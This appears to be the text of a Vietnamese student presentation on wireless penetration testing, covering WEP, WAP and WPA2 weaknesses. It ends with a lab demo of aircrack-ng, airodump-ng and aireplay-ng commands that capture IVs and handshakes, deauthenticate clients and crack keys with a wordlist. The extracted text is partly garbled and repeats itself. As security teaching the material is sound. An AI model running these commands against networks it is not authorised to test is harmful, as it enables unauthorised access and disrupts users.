HỌC VIỆN KỸ THUẬT MẬT MÃ Đề tài KIỂM THỬ XÂM NHẬP MẠNG KHÔNG DÂY QUA WEP, WPAWPA2Kiểm thử xâm nhập mạng không dâyMục lục:Chương 1 Tổng quan về kiểm thử mạng không dây Chương 2 Các giao thức bảo mật mạng không dây WEP, WPAWPA2 Chương 3 Thực nghiệm kiểm thử mạng không dây
Kiểm thử xâm nhập mạng khơng dây Nhóm Mục lục Chương Tổng quan kiểm thử mạng không dây Chương Các giao thức bảo mật mạng không dây WEP, WPA/WPA2 Chương Thực nghiệm kiểm thử mạng không dây sử dụng giao thức bảo mật WEP, WPA/WPA2 Chương Tổng quan kiểm thử mạng không dây Tổng quan kiểm thử mạng không dây - Tổng quan mạng không dây - Kiểm thử thâm nhập mạng không dây Tổng quan kiểm thử mạng không dây - Tổng quan mạng không dây Là công nghệ cho phép nhiều thiết bị giao tiếp mà không cần kết nối vật lý - mà không yêu cầu mạng cáp ngoại vi Công nghệ không dây sử dụng truyền tần số vô tuyến làm phương tiện truyền liệu Bao gồm hệ thống phức tạp Mạng cục không dây (WLAN) điện thoại di động đến thiết bị đơn giản tai nghe không dây, micro, bàn phím, chuột, thiết bị hồng ngoại thiết bị khác không xử lý lưu trữ thông tin - Vai trị mạng khơng dây Là chế vận chuyển thiết bị thiết bị mạng có dây truyền thống (mạng doanh nghiệp Internet) - Phân loại mạng không dây Mạng diện rộng không dây (WWAN), WLAN Mạng cá nhân không dây (WPAN) Tổng quan kiểm thử mạng không dây - Tổng quan mạng không dây Các thiết bị không dây Là thiết bị sử dụng công nghệ khơng dây, thiết bị cầm tay hình thức thịnh hành + Thiết bị kỹ thuật số hỗ trợ cá nhân: PDA (Personal Digital Assistants) tổ chức liệu đủ nhỏ để nhét vào túi áo sơ mi ví PDA cung cấp ứng dụng suất văn phòng, ứng dụng sở liệu, sổ địa chỉ, lập lịch danh sách công việc + Điện thoại thông minh: Hoặc gọi điện thoại di động, điện thoại có khả truyền tín hiệu tương tự kỹ thuật số sóng ngắn cho phép người dùng thiết lập kết nối không dây với thiết bị phát gần Tổng quan kiểm thử mạng không dây - Tổng quan mạng không dây Các tiêu chuẩn không dây + IEEE 802.11: Mạng WLAN dựa tiêu chuẩn IEEE 802.11, IEEE phát triển lần vào năm 1997 IEEE thiết kế 802.11 để hỗ trợ ứng dụng tốc độ liệu tầm trung, cao hơn, chẳng hạn mạng Ethernet để xử lý trạm di động di động + Bluetooth: Là tiêu chuẩn mạng đặc biệt phổ biến Tiêu chuẩn Bluetooth đặc điểm kỹ thuật ngành điện tốn viễn thơng mơ tả cách điện thoại di động, máy tính PDA kết nối với nhau, với điện thoại gia đình điện thoại doanh nghiệp với máy tính sử dụng kết nối không dây tầm ngắn Tổng quan kiểm thử mạng không dây - Kiểm thử thâm nhập mạng không dây Kiểm tra thâm nhập không dây (Wireless penetration testing) trình kiểm tra mức độ đáp ứng an tồn thơng tin cho mạng Wifi, bao gồm phân tích các điểm yếu, luồng kỹ thuật lỗ hổng không dây nghiêm trọng - Mục tiêu kiểm thử thâm nhập mạng không dây + Xếp hạng hiệu chương trình bảo mật không dây + Hiểu đầy đủ rủi ro điểm truy cập không dây mang lại + Khám phá đánh giá lỗ hổng + Tạo kế hoạch hành động theo hướng liệu để sửa chữa lỗ hổng khắc phục rủi ro Tổng quan kiểm thử mạng không dây - Kiểm thử thâm nhập mạng không dây Các rủi ro bảo mật + Điểm truy cập giả mạo: Điểm truy cập giả mạo thiết bị Wi-Fi trái phép không thuộc quyền quản lý quản trị viên mạng khơng an tồn thẳng vào sở hạ tầng có dây mà cơng ty muốn bảo vệ Thiết bị giả mạo dễ dàng hoạt động cổng vào sở hạ tầng mạng có dây Và thiết bị giả mạo định cấu hình mà khơng có ủy quyền bảo mật xác thực, kẻ xâm nhập sử dụng cổng mở để truy cập vào tài nguyên mạng Tổng quan kiểm thử mạng không dây - Kiểm thử thâm nhập mạng khơng dây Các rủi ro bảo mật + Tấn công ngang hàng (Peer-to-Peer): Một cách sử dụng phổ biến mạng đặc biệt chia sẻ tệp cách nhanh chóng Khi quyền truy cập chia sẻ cung cấp, tệp nội dung khác vơ tình bị lộ 10 Chương Các giao thức bảo mật mạng không dây WEP, WPA/WPA2 14 Giao thức bảo mật WEP - WEP (Wired Equivalent Privacy) - bảo mật tương đương với mạng có dây (Wired LAN) Đưa năm 1999 dựa mật mã dòng RC4 15 Sơ đồ mã hóa giao thức bảo mật WEP 16 Hạn chế WEP Initialization Vector - IV) thêm vào trước khóa bí mật tới mơ đun RC4 nhằm tạo khác lần mã hóa → việc sử dụng IV lại nguồn gốc hầu hết vấn đề liên quan tới lỗ hổng bảo mật WEP → nhiều cách cơng mang tính chất thụ động (khơng cần liên lạc với AP) Các cơng cụ bẻ khóa: AirCrack, AirSnort, WepAttack, WepCrack, WepLab 17 Gia tăng mức độ bảo mật cho WEP • Sử dụng khóa WEP có độ dài 128 bit • Thực thi sách thay đổi khóa WEP định kỳ • Sử dụng cơng cụ theo dõi số liệu thống kê liệu đường truyền khơng dây 18 Giao thức WAP •WAP viết tắt "Wireless Application Protocol - Giao thức Ứng dụng Không dây" "một tiêu chuẩn công nghệ" cho hệ thống truy nhập Internet từ thiết bị di động điện thoại di động 19 Giao thức WAP •Giao thức WAP bao gồm lớp: ● ● ● ● ● Lớp truyền tải: giao thức datagram vô tuyến (WDP) Lớp bảo mật: giao thức lớp truyền tải vô tuyến (WTLS) Lớp giao vận: giao thức giao vận vô tuyến (WTP) Lớp phiên: giao thức phiên vô tuyến (WSP) Lớp ứng dụng: Môi trường ứng dụng vô tuyến (WAE) 20 Giao thức WPA2 • Giữa năm 2004, chuẩn WPA hệ thứ hai WPA2 đời có khả bảo mật cao với chuẩn bảo mật IEEE 802.11i • WPA2 sử dụng thuật tốn mã hóa AES (Advanced Encryption Standard) CCMP (Counter Cipher Mode with Block Chaining Message Authentication Code Protocol) nhằm thay cho TKIP Có thể nói WPA2 chuẩn mã hóa an tồn • TKIP có mặt WPA2 để làm phương án dự phịng trì khả tương tác với WPA • WPA2 sử dụng phương pháp chứng thực giống WPA: WPA2 – Personal hay Pre-Shared Key (PSK) WPA2 – Enterprise (EAP/RADIUS) • Độ dài khóa WPA2 lớn, tương tự WPA (thơng thường 128 bit, 192 bit 256 bit) 21 Hạn chế WPA2 • Các lỗ hổng WPA2 hạn chế WPA2 đưa để thay WPA, WPA2 tỏ chưa bộc lộ điểm yếu thuật toán, nhiên phương pháp công truyền thống sử dụng từ điển dùng để bẻ khóa WPA2PSK, người dùng mạng không dây thiết lập bảo mật WPA2 nên đặt mật “khó” để tránh bị cơng phương pháp • Tuy nhiên, lỗ hổng lớn giáp WPA tồn WPA2, WPS Tính WPS thiết bị mạng nên tắt để tránh bị công kiểu brute force 22 Chương Thực nghiệm bẻ khóa mạng khơng dây 23 Thử nghiệm bẻ khóa WEP ● Thông tin thiết bị demo ○ Thiết bị router: TP-link TL-WR840N Ver 6.2 ○ Card Wifi: D-Link DWA-131 ● Crack Password sử dụng AirCrack ○ Bật Monitor Mode: 24 Thử nghiệm bẻ khóa WEP ● Scan Wifi: airodump-ng wlan0 ● Capture the IVs: airodump-ng -c bssid D8:47:32:F3:10:18 -w output wlan0 ● Crack password: aircrack-ng -b D8:47:32:F3:10:18 output*.cap 25 Thử nghiệm bẻ khóa WPA ● Capture IVs ○ airodump-ng -c bssid D8:47:32:F3:10:18 -w output wlan0 ● Buộc handshake xuất cách công deauth để đẩy tất thiết bị khỏi mạng ○ aireplay-ng deauth -a D8:47:32:F3:10:18 wlan0 ● Bắt handshake 26 Thử nghiệm bẻ khóa WPA ● Burte force password với từ điển: ○ aircrack-ng output-03.cap -w wordlist.txt 27 Cảm ơn thầy bạn lắng nghe Nhóm 28 ... mạng không dây Tổng quan kiểm thử mạng không dây - Tổng quan mạng không dây - Kiểm thử thâm nhập mạng không dây Tổng quan kiểm thử mạng không dây - Tổng quan mạng không dây Là công nghệ cho phép... không dây (WPAN) Tổng quan kiểm thử mạng không dây - Tổng quan mạng không dây Các thiết bị không dây Là thiết bị sử dụng công nghệ khơng dây, thiết bị cầm tay hình thức thịnh hành + Thiết bị kỹ... thẳng vào sở hạ tầng có dây mà cơng ty muốn bảo vệ Thiết bị giả mạo dễ dàng hoạt động cổng vào sở hạ tầng mạng có dây Và thiết bị giả mạo định cấu hình mà khơng có ủy quyền bảo mật xác thực,